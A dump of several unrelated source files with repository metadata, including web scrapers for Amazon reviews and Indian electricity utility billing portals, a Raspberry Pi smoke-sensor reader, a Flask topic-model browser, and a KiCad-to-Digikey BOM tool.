url = opener.open("http://www.amazon.com/Apple-iPhone-16GB-Unlocked-Phone/product-reviews/B00NQGP42Y/ref=cm_cr_pr_btm_link_3?ie=UTF8&showViewpoints=1&sortBy=bySubmissionDateDescending&pageNumber="+str(number))
soup = BeautifulSoup(url)
# Review = soup.find('div', id='revMH').find('span','MHRHead').renderContents()
# Title = soup.find('div', id='revMHRL').find('span','a-size-base a-text-bold').renderContents()
# Author = soup.find('div', id='revMHRL').find('span','a-size-normal').find('a','noTextDecoration').renderContents()
# Rating = soup.find('div', id='revMHRL').find('div','a-icon-row a-spacing-none').find('a')['title']
Author = soup.findAll('div',id='cm_cr-review_list')
# Author[0].find('a','noTextDecoration')
print("")
print("<------- Title : ------->")
for a in Author:
names = a.findAll('a','a-size-base a-link-normal review-title a-color-base a-text-bold')
for name in names:
print("")
print name.renderContents()
# authors = a.findAll('a','a-size-base a-link-normal author')
# review = a.findAll('span','a-size-base review-text')
# date = a.findAll('span','a-size-base a-color-secondary review-date')
# rating = a.findAll('span','a-icon-alt')
# for name in names:
# print name.renderContents()
# for name1 in authors:
# print name1.renderContents()
# for name2 in review:
# print name2.renderContents()
# for name3 in date:
# print name3.renderContents()
# for name4 in rating:
# print name4.renderContents()
print("")
print("<------- Author : ------->")
for a in Author:
names = a.findAll('a','a-size-base a-link-normal author')
for name in names:
print("")
print name.renderContents()
print("")
print("<------- Review : ------->")
for a in Author:
names = a.findAll('span','a-size-base review-text')
for name in names:
print("")
print name.renderContents()
print("")
print("<------- Date : ------->")
for a in Author:
names = a.findAll('span','a-size-base a-color-secondary review-date')
for name in names:
print("")
print name.renderContents()
print("")
print("<------- Rating : ------->")
for a in Author:
names = a.findAll('span','a-icon-alt')
for name in names:
print("")
print name.renderContents()
print("")
# print("<------- Review Title : ------->")
# for x in Author:
# title = x.findAll('a','a-size-base a-link-normal review-title a-color-base a-text-bold')
# for finaltitle in title:
# print("")
# print finaltitle.renderContents()
# print("")
# print("<------- Review Content : ------->")
# for y in Author:
# review = y.findAll('span','MHRHead')
# for content in review:
# print("")
# print content.renderContents()
# print("")
# print("<------- Review Rating : ------->")
# for z in Author:
# rating = z.findAll('a')['title']
# for ratingfinal in rating:
# print("")
# print("")
# print("**************************** $$$ *******************")
# print("")
# print ("Title : "+ Title)
# print("")
# print ("Author Name : "+Author)
# print("")
# print ("Review Content: "+Review)
# print("")
# print ("Review Rating: "+Rating)
# print("")
| [
"jehovaram@gmail.com"
] | jehovaram@gmail.com |
64e17a5ea91aa627a5e99f11abecc085abf95e83 | e68cdc27c454f9af90354c9e3a45160453b6812c | /Scrapper.py | 71ecb49743d406c0bf6a9d859fec030ee89014a0 | [] | no_license | dirttech/UtilityScrapper | 73a240dd7154059794d63bbddbdf12dc778946ea | d9c408e3dabf94f977baeaaefdbfa39c8e53470c | refs/heads/master | 2021-01-01T05:37:25.529585 | 2014-06-03T14:43:21 | 2014-06-03T14:43:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,161 | py | __author__ = 'inderpal'
import urllib2
from bs4 import BeautifulSoup
import mechanize
import cookielib
import json
import datetime
import requests
import sys
now = datetime.datetime.now()
day = now.day
month = now.month
year = now.year
Name = ""
City = ""
LoadSanctioned = ""
LoadType = ""
PlaceType = ""
LoadConnected = ""
Address=""
District=""
Circle=""
BillCategory=""
def initBrowser():
br=mechanize.Browser()
cj=cookielib.LWPCookieJar()
br.set_handle_robots(False)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_equiv(True)
br.set_cookiejar(cj)
return br
def ScrapBSESDelhi(customerNo):
try:
br = initBrowser()
br.open('http://www.bsesdelhi.com/bsesdelhi/caVerification4Pay.do')
br.select_form(name='askForNumberBean')
br['txtCA_Number'] = customerNo
resp=br.submit()
soup = BeautifulSoup(br.response().read())
Name = soup.find("div", {"class": "txtCen"}).next.next.string
Address = soup.find("div", {"class": "tc2 fleft"}).next.next.next.next.next.string
elements = soup.find_all("div", {"class": "tc4 fleft"})
LoadSanctioned = elements[3].string
District = elements[13].string
PlaceType = elements[15].string
Circle = elements[9].string
td = soup.find_all("td")
BillReadings=[[0,0]]
BillReadings[0][0] = td[19].string
BillReadings[0][1] = float(td[28].string.replace(',', ''))
br.open('http://www.bsesdelhi.com/bsesdelhi/billHistory.do?caNumber=000'+customerNo)
soup=BeautifulSoup(br.response().read())
td=soup.find_all("td")
for i in range(2, 7, 1):
temp = td[7*i].string
val = float(td[7*i+3].string.replace(',', ''))
BillReadings.append([temp,val])
obj = {u"BillReadings": BillReadings, u"Name": Name[2:], u"Address": Address[2:], u"Sanctioned Load": LoadSanctioned, u"District": District, u"Circle": Circle, u"Place Type": PlaceType}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
return "error"
pass
def ScrapHaryanaBijliVitranNigam(customerNo):
try:
br = initBrowser()
br.open('http://202.56.120.172/elpsoftmis/WebPages/ConsumerInfoStart.aspx')
br.select_form(name='form1')
br['txtKNo'] = customerNo
resp=br.submit()
br.open('http://202.56.120.172/elpsoftmis/WebPages/ViewConsumerInfo.aspx')
soup = BeautifulSoup(br.response().read())
Name = soup.find("span", {"id": "lblName"}).string
City = soup.find("span", {"id": "lblCity"}).string
LoadSanctioned = soup.find("span", {"id": "lblLoadSanctioned"}).string
LoadType = soup.find("span", {"id": "lblLoadtype"}).string
PlaceType = soup.find("span", {"id": "lblBusinessName"}).string
LoadConnected = soup.find("span", {"id": "lblLoadConnected"}).string
BillCategory = soup.find("span", {"id": "lblCategory"}).string
br.open('http://202.56.120.172/elpsoftmis/WebPages/ConsumerDetails.aspx?value=3')
br.open('http://202.56.120.172/elpsoftmis/WebPages/BillingInformation.aspx')
soup = BeautifulSoup(br.response().read())
table = soup.find("table", {"style": "border-width:0px;width:749px;border-collapse:collapse;"})
tr = table.find_all("tr")
ct=0
EnergyReadings = [[0,0]]
for rows in tr:
td = rows.find_all("td")
if(ct == 9):
EnergyReadings[0][0] = td[0].text+" "+td[3].text
EnergyReadings[0][1] = float(td[21].text.replace(',', ''))
if(ct > 1):
try:
val = float(td[24].text.replace(',', ''))
EnergyReadings.append([td[3].text+" "+td[6].text, val])
except:
pass
ct = ct + 1
br.open('http://202.56.120.172/elpsoftmis/WebPages/ConsumerDetails.aspx?value=4')
br.open('http://202.56.120.172/elpsoftmis/WebPages/BillingInformation.aspx')
soup = BeautifulSoup(br.response().read())
table = soup.find("table", {"style": "border-width:0px;width:749px;border-collapse:collapse;"})
tr = table.find_all("tr")
ct=0
BillReadings = [[0,0]]
for rows in tr:
td = rows.find_all("td")
if(ct == 7):
try:
BillReadings[0][0] = td[6].text
BillReadings[0][1] = float(td[12].text)
except:
pass
if(ct > 7):
try:
BillReadings.append([td[6].text, float(td[12].text)])
except:
pass
ct = ct + 1
obj = {u"EnergyReadings": EnergyReadings, u"BillReadings": BillReadings, u"Name": Name, u"Load Sanctioned": LoadSanctioned, u"Load Type": LoadType, u"BillCategory": BillCategory, u"PlaceType": PlaceType, u"City": City, u"Load Connected": LoadConnected}
json_obj = json.dumps(obj)
br.close()
return json_obj
except Exception as e:
return "error"
pass
def ScrapSpancoNagpur(customerNo):
try:
br = initBrowser()
br.open('http://customercare.sndl.in/view_bill.aspx')
br.select_form(name='aspnetForm')
br['ctl00$cph$txtServiceNo'] = customerNo
resp=br.submit()
soup = BeautifulSoup(br.response().read())
tab = soup.find("table", {"id": "ctl00_cph_grdv_Bill_history"})
tr = tab.find_all("tr")
#print tr
EnergyReadings=[[0,0]]
ct=0
for rows in tr:
#print rows
td = rows.find_all("td")
if(ct == 1):
try:
EnergyReadings[0][0] = td[0].text
EnergyReadings[0][1] = float(td[1].text)
except:
pass
if(ct > 1):
try:
EnergyReadings.append([td[0].text, float(td[1].text)])
except:
pass
ct = ct + 1
br.open("http://customercare.sndl.in/frm_bill_print.aspx?serv_no="+customerNo+"&billmonth=Apr-2014")
soup = BeautifulSoup(br.response().read())
#print soup
Name = soup.find("span", {"id": "lbl_name"}).string
Address = soup.find("span", {"id": "lbl_address"}).string
LoadSanctioned = soup.find("span", {"id": "lbl_sancLoad"}).string
PlaceType = soup.find("span", {"id": "lbl_category"}).string
obj = {u"EnergyReadings": EnergyReadings, u"Name": Name, u"Address": Address, u"Sanctioned Load": LoadSanctioned, u"Place Type": PlaceType}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
return "error"
pass
def ScrapBestMumbai(customerNo):
try:
br = initBrowser()
br.open('https://www.bestundertaking.net/CUSTOMERBillInfo.aspx')
br.select_form(name='aspnetForm')
br['ctl00$Contentplaceholder2$ctl02$txtAccno'] = customerNo
resp=br.submit(name='ctl00$Contentplaceholder2$ctl02$btnGo', label='Go')
br.open('https://www.bestundertaking.net/CUSTOMERPaymentInfo.aspx')
soup = BeautifulSoup(br.response().read())
tab = soup.find("table", {"id": "ctl00_Contentplaceholder2_gvPaymentDetails"})
tr = tab.find_all("tr")
#print tr
BillReadings=[[0,0]]
ct=0
for rows in tr:
#print rows
td = rows.find_all("td")
if(ct == 1):
try:
BillReadings[0][0] = td[0].text
BillReadings[0][1] = float(td[1].text)
except:
pass
if(ct > 1):
try:
BillReadings.append([td[0].text, float(td[1].text)])
except:
pass
ct = ct + 1
br.open("https://www.bestundertaking.net/CUSTOMERHome.aspx")
soup = BeautifulSoup(br.response().read())
Name = soup.find("span", {"id": "ctl00_Contentplaceholder2_ctl02_LblCustName"}).string
Address = soup.find("span", {"id": "ctl00_Contentplaceholder2_ctl02_LblAddress"}).next.next.next
obj = {u"BillReadings": BillReadings, u"Name": Name, u"Address": Address}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
print e.__str__()
return "error"
pass
def ScrapMahaVitran(customerNo, locality):
try:
br = initBrowser()
br.open('http://wss.mahadiscom.in/wss/wss?uiActionName=getViewPayBill')
br.select_form(name="viewPayBillForm")
br.set_all_readonly(False)
#payload = {'ConsumerNo': customerNo, 'BuNumber': locality}
br['uiActionName'] = 'getBillingDetail'
br['consumerNumber'] = customerNo
br['BU'] = locality
br['hdnConsumerNumber'] = customerNo
br['hdnBu'] = ''
br['isViaForm']=''
br['hdnBillMonth'] = ''
br['hdnDdlConsumerType'] = ''
#br['consumerType'] = '1'
text_control = br.form.find_control(id="consumerType")
for item in text_control.items:
if item.name == '1':
item.selected = True
txt = br.form.find_control(nr=12)
for item in txt.items:
if item.name == locality:
item.selected = True
cir = br.form.find_control(id='ddlCircleCode')
for item in cir.items:
if item.name == '-1':
item.selected = True
resp = br.submit()
soup = BeautifulSoup(br.response().read())
mnths = soup.find(attrs={"name": "billmnthArr"})['value']
amts = soup.find(attrs={"name": "billAmntArr"})['value']
consumps = soup.find(attrs={"name": "billConsumpArr"})['value']
mnthList = mnths.split(',')
amtList = amts.split(',')
consumList = consumps.split(',')
BillReadings=[[0,0]]
EnergyReadings=[[0,0]]
ct=0
for var in mnthList:
if(ct == 0):
try:
BillReadings[0][0] = mnthList[0]
BillReadings[0][1] = float(amtList[0])
EnergyReadings[0][0] = mnthList[0]
except:
pass
if(ct > 0):
try:
BillReadings.append([mnthList[ct], float(amtList[ct])])
EnergyReadings.append([mnthList[ct], float(consumList[ct])])
except:
pass
ct = ct + 1
Name = soup.find("label", {"id": "lblConsumerName"}).string
Address = soup.find("label", {"id": "lblAddress"}).string
obj = {u"BillReadings": BillReadings, u"EnergyReadings":EnergyReadings, u"Name": Name, u"Address": Address}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
print e.__str__()
return "error"
pass
def ScrapWBSEDCL(customerNo):
try:
br = initBrowser()
br.open('http://www.wbsedcl.in/webdynpro/dispatcher/local/LmvBilling_ZCC/LmvBillingApp')
print br.response().read()
br.select_form(nr=0)
br['MDAA.LmvBillingView.consumerIdInputField'] = customerNo
resp=br.submit()
print br.response().read()
soup = BeautifulSoup(br.response().read())
Name = soup.find("span", {"id": "MDAA.LmvBillingView.consumerName"}).string
Address = soup.find("span", {"id": "MDAA.LmvBillingView.consumerAddress"}).string
td = soup.find_all("td")
BillReadings=[[0,0]]
BillReadings[0][0] = td[19].string
BillReadings[0][1] = float(td[28].string.replace(',', ''))
br.open('http://www.bsesdelhi.com/bsesdelhi/billHistory.do?caNumber=000'+customerNo)
soup=BeautifulSoup(br.response().read())
td=soup.find_all("td")
for i in range(2, 7, 1):
temp = td[7*i].string
val = float(td[7*i+3].string.replace(',', ''))
BillReadings.append([temp,val])
obj = {u"BillReadings": BillReadings, u"Name": Name[2:], u"Address": Address[2:], u"Sanctioned Load": LoadSanctioned, u"District": District, u"Circle": Circle, u"Place Type": PlaceType}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
print e.__str__()
return "error"
pass
def ScrapTANGEDCO(customerNo, locality):
try:
br = initBrowser()
br.open('https://www.tnebnet.org/awp/account?execution=e1s1')
br.select_form(name='form')
br['form:consumerNo'] = customerNo
control = br.form.find_control("form:firstName")
for item in control.items:
if item.name == locality:
item.selected = True
resp=br.submit()
soup = BeautifulSoup(br.response().read())
tab = soup.find("table", {"class": "billtable"})
tr = tab.find_all("tr")
td0 = tr[0].find_all("td")
Name = td0[1].text
td2 = tr[2].find_all("td")
Circle = td2[1].text
td6 = tr[6].find_all("td")
Address = td6[1].text
divv = soup.find("div", {"id": "j_idt31:j_idt233"})
grid = divv.find("table", {"role": "grid"})
tds = grid.find_all("td", {"role": "gridcell"})
BillReadings=[[0,0]]
BillReadings[0][0] = tds[0].next.next.string
BillReadings[0][1] = float(tds[8].next.next.string)
for i in range(1, 6, 1):
temp = tds[14*i].next.next.string
val = float(tds[14*i+8].next.next.string)
BillReadings.append([temp,val])
obj = {u"BillReadings": BillReadings, u"Name": Name, u"Address": Address, u"Circle": Circle}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
print e.__str__()
return "error"
pass | [
"Inderpals@iiitd.ac.in"
] | Inderpals@iiitd.ac.in |
ef27bf70b07265681e123092f152efdfa83c3506 | 91c3eed3612a651d6ba6ab0d2a45c960abec5014 | /SchubbeServer/submodules/smokeSensor.py | 44e2be4f08b63f7bc287bd7bfad977e244d3a11d | [] | no_license | Janessus/SchubbeServer | ee0fb2e5118d4ce59937a16d067ba2df0ccc9fb3 | 27bc785995a0bdb502ecafbd827f7cb455f35aeb | refs/heads/master | 2021-01-02T06:16:40.024713 | 2020-06-23T10:20:01 | 2020-06-23T10:20:01 | 239,526,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,124 | py |
import time
import board
import busio
import adafruit_ads1x15.ads1115 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
# import RPi.GPIO as gpio
def init():
    """Set up the ADS1115 ADC over I2C and return channel 0 as an AnalogIn."""
    # Hardware I2C bus on the board's default SCL/SDA pins.
    bus = busio.I2C(board.SCL, board.SDA)
    # ADC at the default I2C address (0x48); pass address=... to override.
    adc = ADS.ADS1115(bus)
    # Single-ended input on channel 0, where the smoke sensor's analog
    # output is wired.
    channel = AnalogIn(adc, ADS.P0)
    return channel
def getADCValue(chan):
    """Return the raw integer ADC reading from the given AnalogIn channel."""
    raw_reading = chan.value
    return raw_reading
def getADCVoltage(chan):
    """Return the ADC reading converted to volts for the given channel."""
    volts = chan.voltage
    return volts
'''
def printValues(chan):
print("{:>5}\t{:>5}".format('raw', 'v'))
while True:
print("values without formatting: " + chan.value + ", " + chan.voltage + "v")
print("{:>5}\t{:>5.3f}".format(chan.value, chan.voltage))
time.sleep(0.5)
def main():
printValues(init())
'''
| [
"janesheuberger@web.de"
] | janesheuberger@web.de |
9763acf2c3ee9ef17482c7d31f82767ad9733da0 | 415de2699e479b962579d41b2161efb07caabfe5 | /adrien/browser/egc_topic_browser.py | 65512384a96fb2ad4eeb1d75022aaba1149ca19e | [] | no_license | AdrienGuille/EGC-Cup-2016 | 15c64f4095655583bf0ef8fd18cb555cbda640bc | 198f7c8c3b5a2a788004e3359bbdbcda4acdb9c4 | refs/heads/master | 2021-01-02T23:03:00.830428 | 2015-10-25T09:45:53 | 2015-10-25T09:45:54 | 38,754,269 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,419 | py | # coding: utf-8
from nlp.topic_model import LatentDirichletAllocation, NonNegativeMatrixFactorization
from structure.corpus import Corpus
from structure.author_topic_graph import AuthorTopicGraph
import numpy as np
from scipy import stats as st
from flask import Flask, render_template
import utils
from flask.ext.frozen import Freezer
import shutil
import os
__author__ = "Adrien Guille"
__email__ = "adrien.guille@univ-lyon2.fr"
# Flask Web server
app = Flask(__name__)
freeze_browser = True
# Parameters
update_data = False
max_tf = 0.8
min_tf = 4
lemmatizer = None
num_topics = 15
vectorization = 'tfidf'
# Fit a new topic model
'''
# Load corpus
corpus = Corpus(source_file_path='../input/input_for_topic_modeling.csv',
language='french',
vectorization=vectorization,
max_relative_frequency=max_tf,
min_absolute_frequency=min_tf,
preprocessor=None)
print 'corpus size:', corpus.size
print 'vocabulary size:', len(corpus.vocabulary)
# Infer topics
topic_model = NonNegativeMatrixFactorization(corpus=corpus)
topic_model.infer_topics(num_topics=num_topics)
utils.save_topic_model(topic_model, '../nmf_15topics_egc.pickle')
topic_model.print_topics(num_words=10)
'''
# Load an existing topic model
# (Python 2 script: `print` statement is used below.)
topic_model = utils.load_topic_model('../nmf_15topics_egc.pickle')
topic_model.print_topics()
# Associate documents with topics
topic_associations = topic_model.documents_per_topic()
# Extract the list of authors
author_list = topic_model.corpus.all_authors()
# When update_data is True, regenerate every static JSON/TSV file the
# browser's pages fetch; otherwise reuse whatever is already on disk.
if update_data:
    # Clean the data directory
    if os.path.exists('static/data'):
        shutil.rmtree('static/data')
    os.makedirs('static/data')
    # Export topic cloud
    utils.save_topic_cloud(topic_model, 'static/data/topic_cloud.json')
    # Export details about topics: top words, affiliations, yearly frequency.
    for topic_id in range(topic_model.nb_topics):
        utils.save_word_distribution(topic_model.top_words(topic_id, 20),
                                     'static/data/word_distribution'+str(topic_id)+'.tsv')
        utils.save_affiliation_repartition(topic_model.affiliation_repartition(topic_id),
                                           'static/data/affiliation_repartition'+str(topic_id)+'.tsv')
        evolution = []
        for i in range(2004, 2016):
            evolution.append((i, topic_model.topic_frequency(topic_id, date=i)))
        utils.save_topic_evolution(evolution, 'static/data/frequency'+str(topic_id)+'.tsv')
    # Export details about documents
    for doc_id in range(topic_model.corpus.size):
        utils.save_topic_distribution(topic_model.topic_distribution_for_document(doc_id),
                                      'static/data/topic_distribution_d'+str(doc_id)+'.tsv')
    # Export details about words
    for word_id in range(len(topic_model.corpus.vocabulary)):
        utils.save_topic_distribution(topic_model.topic_distribution_for_word(word_id),
                                      'static/data/topic_distribution_w'+str(word_id)+'.tsv')
    # Export details about authors
    for author_id in range(len(author_list)):
        utils.save_topic_distribution(topic_model.topic_distribution_for_author(author_list[author_id]),
                                      'static/data/topic_distribution_a'+str(author_id)+'.tsv')
    # Export per-topic author network
    for topic_id in range(topic_model.nb_topics):
        utils.save_json_object(topic_model.corpus.collaboration_network(topic_associations[topic_id]),
                               'static/data/author_network'+str(topic_id)+'.json')
print 'Topic/corpus browser ready'
@app.route('/')
def index():
    """Landing page: corpus statistics and the model's hyper-parameters."""
    template_args = dict(
        topic_ids=range(topic_model.nb_topics),
        doc_ids=range(topic_model.corpus.size),
        method=type(topic_model).__name__,
        corpus_size=topic_model.corpus.size,
        vocabulary_size=len(topic_model.corpus.vocabulary),
        max_tf=max_tf,
        min_tf=min_tf,
        vectorization=vectorization,
        preprocessor=type(lemmatizer).__name__,
        num_topics=num_topics,
    )
    return render_template('index.html', **template_args)
@app.route('/topic_cloud.html')
def topic_cloud():
    """Render the topic cloud page."""
    template_args = dict(topic_ids=range(topic_model.nb_topics),
                         doc_ids=range(topic_model.corpus.size))
    return render_template('topic_cloud.html', **template_args)
@app.route('/vocabulary.html')
def vocabulary():
    """Vocabulary index page: every (word_id, word) pair in five columns.

    Bug fix: the original sliced exactly 5 * (n // 5) entries, silently
    dropping up to four trailing words whenever the vocabulary size was not
    a multiple of five.  The remainder is now spread over the first columns
    so all words are listed.
    """
    word_list = []
    for i in range(len(topic_model.corpus.vocabulary)):
        word_list.append((i, topic_model.corpus.word_for_id(i)))
    num_columns = 5
    base, extra = divmod(len(word_list), num_columns)
    splitted_vocabulary = []
    start = 0
    for j in range(num_columns):
        # First `extra` columns get one additional entry each.
        width = base + (1 if j < extra else 0)
        splitted_vocabulary.append(word_list[start:start + width])
        start += width
    return render_template('vocabulary.html',
                           topic_ids=range(topic_model.nb_topics),
                           doc_ids=range(topic_model.corpus.size),
                           splitted_vocabulary=splitted_vocabulary,
                           vocabulary_size=len(word_list))
@app.route('/author_index.html')
def authors():
    """Author index page: all (author_id, name) pairs in five columns.

    Bug fix: the original sliced exactly 5 * (n // 5) entries, silently
    dropping up to four trailing authors; the remainder is now spread over
    the first columns so every author is listed.
    """
    indexed_authors = list(enumerate(author_list))
    num_columns = 5
    base, extra = divmod(len(indexed_authors), num_columns)
    splitted_author_list = []
    start = 0
    for j in range(num_columns):
        # First `extra` columns get one additional entry each.
        width = base + (1 if j < extra else 0)
        splitted_author_list.append(indexed_authors[start:start + width])
        start += width
    return render_template('all_authors.html',
                           topic_ids=range(topic_model.nb_topics),
                           doc_ids=range(topic_model.corpus.size),
                           splitted_author_list=splitted_author_list,
                           number_of_authors=len(author_list))
@app.route('/topic/<tid>.html')
def topic_details(tid):
    # Detail page for one topic: lists all documents associated with it,
    # each document carrying (short content, [(author_id, name)], year, id).
    ids = topic_associations[int(tid)]
    documents = []
    for document_id in ids:
        document_author_id = []
        for author_name in topic_model.corpus.authors(document_id):
            document_author_id.append((author_list.index(author_name), author_name))
        documents.append((topic_model.corpus.short_content(document_id).capitalize(),
                          document_author_id,
                          topic_model.corpus.date(document_id), document_id))
    return render_template('topic.html',
                           topic_id=tid,
                           frequency=round(topic_model.topic_frequency(int(tid))*100, 2),
                           documents=documents,
                           topic_ids=range(topic_model.nb_topics),
                           doc_ids=range(topic_model.corpus.size))
@app.route('/document/<did>.html')
def document_details(did):
    # Detail page for one document: its top-weighted vocabulary terms and
    # the 5 most similar documents in the corpus.
    vector = topic_model.corpus.vector_for_document(int(did))
    word_list = []
    for a_word_id in range(len(vector)):
        word_list.append((topic_model.corpus.word_for_id(a_word_id), round(vector[a_word_id], 3), a_word_id))
    # Sort by weight descending; only the 20 heaviest words are displayed.
    word_list.sort(key=lambda x: x[1])
    word_list.reverse()
    nb_words = 20
    documents = []
    # another_doc is (doc_id, similarity score).
    for another_doc in topic_model.corpus.similar_documents(int(did), 5):
        document_author_id = []
        for author_name in topic_model.corpus.authors(another_doc[0]):
            document_author_id.append((author_list.index(author_name), author_name))
        documents.append((topic_model.corpus.short_content(another_doc[0]).capitalize(),
                          document_author_id,
                          topic_model.corpus.date(another_doc[0]), another_doc[0], round(another_doc[1], 3)))
    return render_template('document.html',
                           doc_id=did,
                           words=word_list[:nb_words],
                           topic_ids=range(topic_model.nb_topics),
                           doc_ids=range(topic_model.corpus.size),
                           documents=documents,
                           authors=', '.join(topic_model.corpus.authors(int(did))),
                           year=topic_model.corpus.date(int(did)),
                           short_content=topic_model.corpus.short_content(int(did)),
                           article_id=topic_model.corpus.data_frame.iloc[int(did)]['url'])
@app.route('/word/<wid>.html')
def word_details(wid):
    # Detail page for one vocabulary word: all documents containing it.
    documents = []
    for document_id in topic_model.corpus.docs_for_word(int(wid)):
        document_author_id = []
        for author_name in topic_model.corpus.authors(document_id):
            document_author_id.append((author_list.index(author_name), author_name))
        documents.append((topic_model.corpus.short_content(document_id).capitalize(),
                          document_author_id,
                          topic_model.corpus.date(document_id), document_id))
    return render_template('word.html',
                           word_id=wid,
                           word=topic_model.corpus.word_for_id(int(wid)),
                           topic_ids=range(topic_model.nb_topics),
                           doc_ids=range(topic_model.corpus.size),
                           documents=documents)
@app.route('/author/<aid>.html')
def author_details(aid):
    # Detail page for one author: their documents and the skewness of their
    # topic distribution (high skew = author concentrated on few topics).
    documents = []
    for document_id in topic_model.corpus.documents_by_author(author_list[int(aid)]):
        document_author_id = []
        for author_name in topic_model.corpus.authors(document_id):
            document_author_id.append((author_list.index(author_name), author_name))
        documents.append((topic_model.corpus.short_content(document_id).capitalize(),
                          document_author_id,
                          topic_model.corpus.date(document_id), document_id))
    repartition = np.array(topic_model.topic_distribution_for_author(author_list[int(aid)]))
    skewness = float(st.skew(repartition, axis=0))
    return render_template('author.html',
                           author_name=author_list[int(aid)],
                           author_id=str(int(aid)),
                           affiliations='',
                           topic_ids=range(topic_model.nb_topics),
                           doc_ids=range(topic_model.corpus.size),
                           documents=documents,
                           skewness=round(skewness, 3))
if __name__ == '__main__':
    # Two modes: freeze the whole site to static HTML (for publication on a
    # web server) or run the live Flask development server.
    if freeze_browser:
        app.config.update(
            FREEZER_BASE_URL='http://mediamining.univ-lyon2.fr/people/guille/egc2016/',
        )
        freezer = Freezer(app)
        # URL generators: Frozen-Flask needs these to enumerate every
        # parameterized page (topics, documents, words, authors) to render.
        @freezer.register_generator
        def topic_details():
            for topic_id in range(topic_model.nb_topics):
                yield {'tid': topic_id}
        @freezer.register_generator
        def document_details():
            for doc_id in range(topic_model.corpus.size):
                yield {'did': doc_id}
        @freezer.register_generator
        def word_details():
            for word_id in range(len(topic_model.corpus.vocabulary)):
                yield {'wid': word_id}
        @freezer.register_generator
        def author_details():
            for author_id in range(len(author_list)):
                yield {'aid': author_id}
        freezer.freeze()
    else:
        # Load corpus
        app.run(debug=True, host='localhost', port=2016)
| [
"adrien.guille@gmail.com"
] | adrien.guille@gmail.com |
2d15ec2b8d64cbb34b07779dbf0de9ce79ece52e | d3f9b18dccba61c88aab4e1d1d73dc96c1b87094 | /Python/CodingDojo_Python/Django/log_reg_projs/Main3/MAIN/MAIN/wsgi.py | c705725265194d75f294281d91cd40cec3a68ba7 | [] | no_license | sambragge/DojoAssignments | fc13cbccb79a71427f09e4f960ba6a664e8be408 | 6de385bc6b0bb9c0ae70c5750c9044a0668a17c9 | refs/heads/master | 2021-06-21T05:21:10.068026 | 2017-05-07T18:32:47 | 2017-05-07T18:32:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 386 | py | """
WSGI config for MAIN project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Tell Django which settings module to use before building the application.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "MAIN.settings")
# Module-level WSGI callable that servers (gunicorn, mod_wsgi, ...) import.
application = get_wsgi_application()
| [
"sam@Samuels-MacBook-Pro.local"
] | sam@Samuels-MacBook-Pro.local |
59ab3b8c00e340f686e72893e1533b2c4bc80c26 | 14ec9fc9aee69d54701168c069df4fe46a27b811 | /makeDigikeyBOM.py | 67fa76a4e374de9b7f2442ed9f00517b1d4886b5 | [] | no_license | BitKnitting/MakeDigikeyBOM | 1af6e79b9c9bb86590425ec06bbacc63fa2cbb60 | ef12a92dec3abbd86571b40d6ea7ea72fa6e60b1 | refs/heads/master | 2021-01-13T00:59:15.063713 | 2017-02-20T18:30:42 | 2017-02-20T18:30:42 | 53,728,672 | 10 | 0 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | #
# The main entry point to making a digikey Bom CSV file from the output of bom2csv
# as discussed in the bitknitting blog post: https://bitknitting.wordpress.com/2016/03/05/from-kicad-to-digikey-generating-a-bom-based-on-esteem-overview/
#
import logging
logger = logging.getLogger(__name__)
from replaceJellyBeanParts import replaceJellyBeanParts
from makeDigikeyFile import makeDigikeyFile
from getParts import getParts
def makeDigikeyBOM(outputFrom_bom2csv,jellyBeanFile,outDir,numProcesses):
    """Build a Digikey BOM CSV from the bom2csv output.

    Substitutes jellybean parts, groups components by part number, then
    writes the Digikey file into outDir.  Failures are logged, not raised.
    (numProcesses is currently unused here.)
    """
    substituted_csv = replaceJellyBeanParts(outputFrom_bom2csv=outputFrom_bom2csv,
                                            jellyBeanFile=jellyBeanFile)
    parts_by_number = getParts(modifiedBOM2csvFile=substituted_csv)
    succeeded = makeDigikeyFile(parts_by_number, outDir)
    if not succeeded:
        logger.error("Could not make the Digikey file. Check output from logger.")
"farmerrobbie@freshsalad.today"
] | farmerrobbie@freshsalad.today |
506914e27072e3732420f2074b84705988b980b3 | 619e18c1006f2e9e8960e800edb0490131b1ca35 | /poc.py | e13810b86de3fa773f4376551d4f7fc3575b42ba | [
"Apache-2.0"
] | permissive | Gibstick/hocr-to-zuvaocr-converter | 4c0b61e39d5f420a2185c34aee81c4f9a50b0c7d | b7eafed23a00efd1ee6caa748e2fdb7788aed914 | refs/heads/main | 2023-08-22T21:02:15.739377 | 2021-10-07T13:44:46 | 2021-10-07T13:44:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,690 | py | # Copyright 2021 Zuva Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This proof of concept uses the ZDAI Python Wrapper found below:
# https://github.com/zuvaai/zdai-python
# Comment out lines 22 and 65-onwards if you wish to skip it.
import hashlib
from HOCRToZuvaOCRConverter import HOCRToZuvaOCRConverter
from zdai import ZDAISDK, Language, Classification, Extraction
from datetime import datetime
import time
import os
from colorama import Fore
hocr_folder = 'out/CANADAGOOS-F1Securiti-2152017/'
zuva_ocr_file = 'CANADAGOOS-F1Securiti-2152017.zuvaocr'
